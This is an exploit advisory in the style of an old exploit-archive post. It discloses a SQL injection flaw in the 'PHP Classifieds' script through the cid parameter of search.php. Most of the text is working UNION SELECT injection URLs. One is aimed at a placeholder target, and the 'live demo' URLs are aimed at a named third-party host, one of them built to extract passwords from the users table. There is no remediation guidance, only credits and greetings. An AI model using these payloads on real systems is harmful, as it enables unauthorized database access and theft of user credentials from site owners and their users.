PHP Classifieds[cid]Remote SQL Injection Vulnerability
   --------------------------------------------------------------------------------


----------------------------------------------------------------
script : PHP Classifieds

script  :  http://www.preprojects.com/pclphp.asp

Risk : High

----------------------------------------------------------------

Dicovered by : d3b4g

email : bl4ckend[at]gmail[dot]com

Site. www.bl4ck3nd.info

----------------------------------------------------------------
Exploit : http: //www.target.com/[path]/search.php?cid=-1+union+all+select+1,2,concat_ws(@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*


Live demo: http: //www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(@@version),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*


For passowrd : http://www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*


For admin : [Find it ] :P
----------------------------------------------------------------


----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================